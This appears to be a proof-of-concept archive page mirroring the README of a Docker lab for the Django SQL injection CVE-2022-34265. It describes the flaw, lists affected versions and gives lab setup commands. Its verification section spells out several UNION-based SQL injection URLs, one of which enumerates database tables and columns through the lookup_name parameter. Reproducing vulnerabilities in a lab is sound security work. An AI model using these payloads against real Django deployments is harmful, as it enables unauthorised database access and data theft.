关联漏洞
标题:
Django SQL注入漏洞
(CVE-2022-34265)
描述:Django是Django基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 3.2.14 版本之前 3.2 版本和 4.0.6 版本之前的 4.0 版本存在SQL注入漏洞,该漏洞源于如果将不受信任的数据用作 kind/lookup_name 值,则 Trunc() 和 Extract() 数据库函数会受到 SQL 注入的影响。
介绍
# CTF_CVE-2022-34265
## Description
An issue was discovered in Django 3.2 before 3.2.14 and 4.0 before 4.0.6. The `Trunc()` and `Extract()` database functions are subject to SQL injection if untrusted data is used as a kind/lookup_name value. Applications that constrain the lookup name and kind choice to a known safe list are unaffected.
## How to use
### Start
```bash
git clone https://github.com/coco0x0a/CTF_CVE-2022-34265
cd CVE-2022-34265
sudo docker-compose up -d
```
### Check status
```bash
sudo docker ps
```
### Remove
```bash
sudo docker-compose down
```
## Affected Versions
* Django>= 3.2, < 3.2.14
* Django >= 4.0, < 4.0.6
## Patched versions
* Django 3.2.14
* Django 4.0.6
## Verification
### Environment
* Django 4.0.5
* Python 3.8.13
* MySQL 5.7
### sql injection
using `UNION`
```
http://127.0.0.1:8000/extract/?lookup_name=year%20FROM%20start_datetime))%20OR%201=1%20UNION%20SELECT%201--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT 1, 2, 3, 4, 5, 6, 7--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT 1, now(), now(), now(), now(), now(), now()--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT "TEST", now(), now(), now(), now(), now(), now()--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT CONCAT(table_name, '~', column_name), now(), now(), now(), now(), now(), now() FROM information_schema.columns--
```
## Reference
https://github.com/aeyesec/CVE-2022-34265
https://github.com/ZhaoQi99/CVE-2022-34265
https://github.com/suksit/writeups/tree/main/secplayground/half-year-event-2022
文件快照
[4.0K] /data/pocs/7a0f891e828e2fb31fc2ab9c6226058d7121c6b1
├── [4.0K] app
│ ├── [ 383] asgi.py
│ ├── [ 0] __init__.py
│ ├── [4.0K] __pycache__
│ │ ├── [ 142] __init__.cpython-39.pyc
│ │ ├── [2.3K] settings.cpython-39.pyc
│ │ └── [1.0K] urls.cpython-39.pyc
│ ├── [3.3K] settings.py
│ ├── [ 862] urls.py
│ └── [ 383] wsgi.py
├── [ 605] docker-compose.yml
├── [ 439] Dockerfile
├── [4.0K] lab
│ ├── [ 87] admin.py
│ ├── [ 383] asgi.py
│ ├── [ 0] __init__.py
│ ├── [4.0K] migrations
│ │ ├── [1.2K] 0001_initial.py
│ │ ├── [ 450] 0002_rename_name_flag_secret_remove_flag_description.py
│ │ ├── [ 0] __init__.py
│ │ └── [4.0K] __pycache__
│ │ ├── [ 984] 0001_initial.cpython-39.pyc
│ │ ├── [ 616] 0002_rename_name_flag_secret_remove_flag_description.cpython-39.pyc
│ │ └── [ 153] __init__.cpython-39.pyc
│ ├── [ 609] models.py
│ ├── [4.0K] __pycache__
│ │ ├── [ 252] admin.cpython-39.pyc
│ │ ├── [ 142] __init__.cpython-39.pyc
│ │ ├── [1001] models.cpython-39.pyc
│ │ └── [1.1K] views.cpython-39.pyc
│ ├── [3.1K] settings.py
│ ├── [ 745] urls.py
│ ├── [ 849] views.py
│ └── [ 383] wsgi.py
├── [ 659] manage.py
└── [1.8K] README.md
6 directories, 30 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。